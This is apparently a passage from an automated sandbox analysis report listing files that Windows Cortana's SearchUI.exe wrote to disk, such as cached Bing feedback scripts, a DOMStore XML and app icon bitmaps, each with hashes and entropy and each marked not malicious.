                      MD5:F44EA9D80C88FBCDA801F3A2E0D79E8D
                      SHA1:942DAC5E088686F2D09D048AA5F376DE366421E1
                      SHA-256:57DEBE6CDD1AEBDE19A85A2B95AA78FD8DCA4726F12BBB0D59931E5F21F92C85
                      SHA-512:2AB3D3F4551DD32F0AA7BF50660FBC28FD690C95108AA460C4C465DEF883A7D76DE1E286D3132029BECA767AE615A0DF788F91D7367CD9D0C9DA32754CB3364D
                      Malicious:false
                      Preview: var Microsoft,__extends,WindowsFeedback,Feedback;(function(n){var t;(function(t){"use strict";function e(t){for(var f=null,r,i,u=0;u<t.length;u++){r=t[u];try{i=r.provide()}catch(e){n.le("Query provider "+r.name+" failed",e)}if(typeof i=="string"&&i.length>0){f=i;break}}return f}function p(t){var r=t.querySelectorAll('input[type="radio"][required][name]'),i=!0;return n.Core.ForEach(r,function(n){var r=n.getAttribute("name"),u='input[type="radio"][required][name="'+r+'"]:checked',f=t.querySelector(u)!==null;i=i&&f}),i}function l(t,i){var r,u;return t===window?t.document.documentElement["client"+i]:t.nodeType===9?(r=t.documentElement,u=t.body,Math.max(u["scroll"+i],u["offset"+i],r["scroll"+i],r["offset"+i],r["client"+i])):parseFloat(n.Core.GetComputedStyle(t)[i.toLowerCase()])}function a(n,t,i){var u={},f;for(var r in t)u[r]=n.style[r],n.style[r]=t[r];f=i(n);for(r in t)n.style[r]=u[r];return f}function w(){y(!1)}function v(n){y(!0,n)}function y(t,i){n.Core.ForEach(_d.querySelectorAll('inp
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BG06Q2R0\--hmjjiJHWhRgEtIYT83RRVIm1E[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines
                      Category:dropped
                      Size (bytes):19775
                      Entropy (8bit):5.349039960637801
                      Encrypted:false
                      SSDEEP:384:KXOm2guCn7IultyC7hh6+fF5mWZ3BnqIfPhiGmVY4OtKAvKXAL5NuwK3++9O:wDa8R+uBpBnqIHeYPt4XALulO
                      MD5:C91FD6A20951ECA2C0CE3DB49982776F
                      SHA1:0B993CDC14CA5B5F5BBB8916575C06FBB6B09929
                      SHA-256:BA28010470516B9C630093B289BE6998F065EC8749FC50D58B09438348B998B9
                      SHA-512:E634C454B62EC2AEA323D3A312D383EBB2D494AA7E2C6AC9A0B7A8BA5EFD778AB7D60C56283BD156975693906EA63BB9FBCFB7CD4FAF24E1A856DBD56A0622EB
                      Malicious:false
                      Preview: /*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:1e3,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50}},function(n){function st(){if(!document.querySelector||!document.querySelectorAll){p({FN:"init",S:"QuerySelector"});return}y={};f=[];nt=1;g=0;d=0;e=[];o=0;s=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:dt,M:i,T:0,K:i,F:0}};fi()}function ni(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function ti(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function it(n,t,i,r){if(!s){p({FN:"snapshot",S:n});return}i=i||pt;t=t||!1;var u=b()+i;rt(e,n)===-1&&e.push(n);t?(ht(),ct(t,r)):u>o&&(ht(),d=sb_st(ct,i),o=u)}function p(n){var f={T:"CI.BoxModelError",FID:"CI",Name:ft,SV:et,P:t&&"P"in t?w(t.P):i,TS:r(),ST:l},u,e;for(u in n)f[u]=n[u];e=w(f);lt(e)}functio
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\6C6MUTHU\www.bing[1].xml
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):20183
                      Entropy (8bit):5.569509322281312
                      Encrypted:false
                      SSDEEP:384:5Qilq95lq9NaepHC4o6y+Z++eS6y+uTn8ETn8P2SNcgkHxmdEf5+JZfEb6lbRKXT:Gilg5lgNXHzo6XZ++f6XuT8ET8ugSSb+
                      MD5:27CB8311FA205EFA6C096C6675230EFF
                      SHA1:2A0E2990A4BA547CD64C8C7F702B2A23A600B895
                      SHA-256:04F0FD3CFBAC8432426B7B6FA63AEA45E463384DE23A1606322A071B3A3C3570
                      SHA-512:E1E47BBC3D23030E1B8EA89AD7453AFA26FBF02CC74566A961661DF20DFD81437EABB5ABC3E73AA0EBDE9A77BF9DAAD6B5C63DED98EE5EB29C2819BC971DA9E9
                      Malicious:false
                      Preview: <root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /><item name="CB47C15FA3044AB884F7E32B9FD32ED2" value="1" ltime="3967458428" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1609839249586" ltime="3969033662" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3950151987" htime="30860101" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1609839249586" ltime="3969033662" htime="30860101" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3969107766" htime="30860101" /></root><root><item name="eventLogQueue_Online" value="[{&quot;log&quot;:{&quot;type
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{116229A7-9A3B-2078-DB5F-B5A20811242C}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.34033989669677
                      Encrypted:false
                      SSDEEP:384:8B0oQuMwZSRk5Q/YsS+Z6RyNk+BVfiMpOAm7lLmZL7C/tH0gDTT4jwjqzJgnXx6u:8yurZSRT/Y/+EElOA4lS8mKhMJI
                      MD5:9F1FF11E31C55A87372E85612CA3C290
                      SHA1:C94DC58D7E8F070D3EEFF5BC8ECB3A2D7008323D
                      SHA-256:0C650065D284A6A0F6A17CE2250214B40219B7082E940689A2CD2948162FD893
                      SHA-512:DD490E167B4455AACE73DDA6D9EC6B90AEE5E5994701C249A44D316B17C3F8A8F5E776E9ECB6D751DFBED8E74743A3F13D95EDBBF3B09998E148BFCBA1EF721F
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8DA2943B-094F-3D66-6152-6200F3669B3B}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.4076523679367945
                      Encrypted:false
                      SSDEEP:384:RP2VsaVeazApIvzLEYXqK8nsNkhHZt6hkB:qsacakpIv1XDQDH6
                      MD5:0705D6835877CF0E3C45FC7427647C75
                      SHA1:B03330CD06F821600BB0323E7C2277311F065F6F
                      SHA-256:B04759FEE392D36CC20A319943C4DDAC356CD1FBED6223A4961688689350A84E
                      SHA-512:0FAAF02180EF6EA2A8A74AB2BE7B72BE24EFF69E5AECDF97BEC838A637E7B3EFB85FFED32C2E035B2100615E2711CCCBE8AFE231EC55A7245D00D6C98329D83C
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.9609861318177852
                      Encrypted:false
                      SSDEEP:384:c1VHQVZVSVVb/g0VBRL+SVoxycdz74t9byqQes5oVn0D:c1VwVZVSVVb/DVBRCyA74tLQes5oVn0
                      MD5:6BA483C92ECC054466753E522DB97936
                      SHA1:F46A0ED2D9D68A979241974F1588D076F64F68AA
                      SHA-256:25B4C976977835C431D466DB710FF3D5861CACC4E77683EC6FD4D5C9D5AE0AFD
                      SHA-512:BA9FCC6B649BA53BBEAD16CC9E47741FBF4ABB3D115212B15931D7E759B07A3DDD926042EBC93DC1887DD25DD33044C44BAE4FCAF2452217D7D1180B1B269F0B
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.016255257321986
                      Encrypted:false
                      SSDEEP:384:rqR7f4IL0WIon6qn10OvvbTgUYZDTNfM56ElfxT1StD005V2ULKVehiWATb:mR7wfqn10OriZf9g4fz/KcgW6b
                      MD5:E799EFF0B7816A5587D146F9BB951F1F
                      SHA1:28F99125424D8E0647ED01A21C378362DE181CDB
                      SHA-256:DAEE10EEF8CDAD237BEE08E5429E529BCA3B7A10C1BD76578588108A3A6B272B
                      SHA-512:02AD638295B2A21C3B4367E7F3EF345B81E3BA8C62C61A97EF51B1F102C28B2FD6863F3CA1B3B87051EC95DA92C42A8BFCD4E0ADF18CEBD3DE0A2C27A388D563
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.248171854641737
                      Encrypted:false
                      SSDEEP:768:FSkObxrpH58SQedKP7oBMHNzOGpXXXYySXTzBq:IkObxrt58SHdKP7oBMwyXXIySjV
                      MD5:2E455B88290024BA91A90DEB1F194A19
                      SHA1:D17027449BFFEF8C398FF1FFD8FBF078171805EA
                      SHA-256:65AFC3F47F89F404BB847ECA3C445BCBB15AF5FE0905FC050FCB6B6D2F6D00CC
                      SHA-512:1CEA9D5922894FE900DF5B186AF735997CDC2132CCDCE5690681F4E55608C5C9DBFD5B072C81453AC7456DF7FE6577F55E5F86900363FD3ACFAFA78DBCD6AC5F
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.34033989669677
                      Encrypted:false
                      SSDEEP:384:8B0oQuMwZSRk5Q/YsS+Z6RyNk+BVfiMpOAm7lLmZL7C/tH0gDTT4jwjqzJgnXx6u:8yurZSRT/Y/+EElOA4lS8mKhMJI
                      MD5:9F1FF11E31C55A87372E85612CA3C290
                      SHA1:C94DC58D7E8F070D3EEFF5BC8ECB3A2D7008323D
                      SHA-256:0C650065D284A6A0F6A17CE2250214B40219B7082E940689A2CD2948162FD893
                      SHA-512:DD490E167B4455AACE73DDA6D9EC6B90AEE5E5994701C249A44D316B17C3F8A8F5E776E9ECB6D751DFBED8E74743A3F13D95EDBBF3B09998E148BFCBA1EF721F
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.165623013739233
                      Encrypted:false
                      SSDEEP:384:qWF8n4AeWgpCOp2rtRunpj+3Yliy3gTs2ojDKgYeh:q0m4AXgpzeRunpjXwo2ojDKgY
                      MD5:855718D0BD86E35B1D42CEABDCFC61B3
                      SHA1:2A6698C8231E2FA27F93FD5141A252A4B06251B1
                      SHA-256:78C940DE004462F42D6BD01AAA33CD73F2C3B06652730C385F1F9C4760AC9537
                      SHA-512:BEA1A7AC95E76B120C65BCE325D87C27D385F992C6B95DEF100BA50FC4E7EAF13C61C10BD95231046885A17AFA1ABA3FC4158D095360CAA46412AE8B136288B8
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{FBFBA9BA-D159-E700-1D51-AC1FBB779882}
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_BingWeather_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1095084859402944
                      Encrypted:false
                      SSDEEP:12:mqYmuXf9N9N9N0tXsPXI7XfnH/H8tMt3vH1df/nHF9FTfBF9F9H/nfsdvHn33JpY:mqhZ0aQY
                      MD5:0F370F0614A3FD886ECA312155DFFAD4
                      SHA1:D1226B4766895F3EC28E20D6487DC96A59834D51
                      SHA-256:A4BE3AAC061D032A2FA24D58D56ED0718F3309D7871E080F1C039F48EF74FC33
                      SHA-512:E5B15E355B3EE0DD1BE809F44AA9A03391D977E35F09ED3BD1DE25A93DC604ADDFD7EB014FEEF1AC9D958C95EFEF1C8593DFB2E2CF3D8C0BCBE6D40C827AD5C5
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_GetHelp_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.95774981000546
                      Encrypted:false
                      SSDEEP:12:mqYmu/yflf7S2L2LOLii+6jf+G2/qGqmKeTr/iuuK6SGqGbLqKmwy662K2faPCPw:mq3RfKin+WjLK/iSLent67zP/
                      MD5:D7573DDE6CE9E43B7BDDFFD5E7538165
                      SHA1:CE196EEEF030650B1DEEE42CFB4164B8AAE1414B
                      SHA-256:CA5DA1F7CF38E128E909FDAF89C79EE595332575344366FE5FBC849683DCF0F8
                      SHA-512:508540A0B66FCAA42D3DC375EE655C04EB31199F0EF0D71B39FCEF269B9FC60B1D398D11A63A685E3336E19DAB846B6176CAC613E89934EB4AD0D10ED29E77EA
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Getstarted_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.8922953628480119
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000o:mqYmu7K+3a3aiO/C2i3v33uCjaL
                      MD5:088DA920D5C27B02630F2B0E26F78D07
                      SHA1:F0294ED86DE947640D734D90A2597C00C2D882EB
                      SHA-256:975FF9F02FF7DCF059FDCD7F81096F479BEA409F2A9D0784E4C24402E604F4E1
                      SHA-512:3994ECA522D56598B5790D54840B363C6F3C8AE8C0BFEFF7C2F6B8391CF1221FE071254CA52C02FA9EC960657BDFE9B0F85D6A3E37AB66CAB6FBF978CD6687DA
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_InternetExplorer_Default
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.300929850213194
                      Encrypted:false
                      SSDEEP:384:dI2sma3bU7UbCbH/1BD1RmXJEFjmvqSO/vUTAdF+vkTOhV0k1vh:MmaA7UbCbH/71R7PdQvkChVf
                      MD5:3F7A4B60EACE07C59CA0C9072FE1A711
                      SHA1:06758E981F2EFAFB5822873D36B218E40CD7EE94
                      SHA-256:8FDC9FDD3ADFE90A6BF4765C9B614B7072ECE2BFBA319D09B8E437B33A59FC4F
                      SHA-512:1227E79685832D7B850677170BF4E04C895776D05628030267D3D659B675CE85ADBE2DD7E2423BA46969264903DD74D4A243B9747E8B07031B11CF7F4A9785FA
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Messaging_8wekyb3d8bbwe!x27e26f40ye031y48a6yb130yd1f20388991ax
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 66 x 66 x 32
                      Category:dropped
                      Size (bytes):17574
                      Entropy (8bit):0.6874694166330877
                      Encrypted:false
                      SSDEEP:12:gqYmu3myaGO/GeyLi6ybqrPC6Cq2qbyaiT:gqazDGGeGf2ePfP2Ov8
                      MD5:410F5D365C0E5B8AB2BAACE73D5E2AC4
                      SHA1:8FF55D6286FABDD6DC9DBEDEF9B489A8BBF0E0D1
                      SHA-256:DA426537185759CF35B42D7D433B7F614B82F2B6FDE76272BB6AE5858D2C07DA
                      SHA-512:3293C271B4D19CA00FF2ED491955D4FF77A2CE95261ADAEC21C2E344CB5F8EA1834AAAE9FF161E3F3E5C87487ED0C30E7237CB69C61B71FFADAEBD3C8CB181CE
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.9615285749764766
                      Encrypted:false
                      SSDEEP:24:mqZEjX6jg88HH/xUx48VjxqNa/hJPEpjq/j/i/:kjX6jLkJW48Lqk5Kc7K
                      MD5:A0E8C463875933C8F29F5B35DCA52D0B
                      SHA1:8A76673A986394F65691174A30EE1E7B9389FCD5
                      SHA-256:3B61D5489BAD522B2705FB0025BF7F1E34ADE73619B5138A7F1264014E7AC7B8
                      SHA-512:09A92C02E73E6EC31C351C801C6CC477EBD5F7B09BBF2E0A877D58434BBF19ECD7772AF55F162D78DDA51E3221FF8A9E1D6315CFFF67746C83316FE136B72811
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):2.404889068864702
                      Encrypted:false
                      SSDEEP:192:TS7i7G7I7I7I7I7I7I7I7I7I7I7I7I7I7I7I7vEjz:TS7i7G7I7I7I7I7I7I7I7I7I7I7I7I7l
                      MD5:321A73AF0AD9A4A0C171026AFCED10CF
                      SHA1:C53CCEB354AEA9729F3A8B3A1A48D0F33233EF18
                      SHA-256:14D29ABB1E17427846F055B96A738C822D517AA8F329CD9962E3E79058949935
                      SHA-512:0D595E97C7794F85DAD9B99310BE1C5D7ABFAEEC8AF939840DD54896815AA53CA2D44694DA21CA2C19AF066CC9DDD642C4303EEF37B3C4337F23030F2B359C8D
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftSolitaireCollection_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1579699636009178
                      Encrypted:false
                      SSDEEP:48:FzRT+RKlUMf8fefnzye2a59ZGSVFLwZPF:pJxfzl9ZlFLwr
                      MD5:FD7D542ED6A213D62851DAF5B4872B58
                      SHA1:8458AA63DCEA54B3E2378183D1C69FAF288E76B9
                      SHA-256:89701D14E70B95EBC8CD976CE8F61CD5278EFFF80A2A2389B47DD2933AFADAE6
                      SHA-512:87A20815FA48212157A3860F18F2D31999042AEE36040B236BF0EE13EAAAE99DFCE435BECDE1C11586270271183FE17E7D692D149D86D4D0C51B6ED8819ADD03
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftStickyNotes_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):2.0961750368604006
                      Encrypted:false
                      SSDEEP:24:mqSp13tBre9bHXwHsIuYpberQ5rfO9oUO:k3jrcTXssINbSgrfp
                      MD5:BF20B0FE7280C69AB57E6EEF1D16C29C
                      SHA1:6A3CA709DD4ABF8033C1A2B8E9F6CAB315445D23
                      SHA-256:43826FA4A929F9CFD492AE9EEB0DCDE75147DFE2E2CFD36D1B1372B45BB13F27
                      SHA-512:6C049418533D3C2FDF1137E055EA438964BBA9234A475AE816580C060C45E6F5E001C60438823FEB4832A92C6EE1159C9A1951324AFB43261FC9A2EFD897453D
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MixedReality_Portal_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0029937207885342
                      Encrypted:false
                      SSDEEP:12:mqYmuSKuSqGCPeKyqqX7SqL2/SbS6TXXGKyjqD:mqCu/GG/+/y/WvXek
                      MD5:4214A31D10FA06C2D1636AB4B4A43168
                      SHA1:8F130013C3EA6FEC6D24952940FD0DC53FC7E378
                      SHA-256:9EEAE0D45CDE62955407D4DED176412E637151D988F1EF14E39E90B8F098F0E3
                      SHA-512:4BFBAAF3F9FAF4867CA93FDD1232F720ED6822FFB0EF1AE7FC3BDC00ED8E9C456377B9F3B43565C6F2E4788F028803C5ACA0AF7439E99A382E333E9FC7FB9AA3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_EXCEL_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.826253208559914
                      Encrypted:false
                      SSDEEP:192:ChHR82uYhuGwRJRtU1t+1L0H0XxeW3kJWQfsKBLq:e8i6wI
                      MD5:2C3D8B38F4706D2BD623310DE468A21B
                      SHA1:43AA3A23BE9E599C8DF874B631E2291FA0FD5E25
                      SHA-256:EB7C131073394F7824CD2152E9EF1F87BFA7FEB09097AF42D7A882B3AD7B7AC3
                      SHA-512:45FA14F771ADB80EAAC8D0BC02E70D9E9E453D27238698C7953DE7434C4A182EADAD6E7FC908DE4E5BABD487F9DC917FA3BA67CA599C5889804D948DA7FD1FD8
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_MSOUC_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.864127619296489
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_ONENOTE_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.8486940892700168
                      Encrypted:false
                      Malicious:false
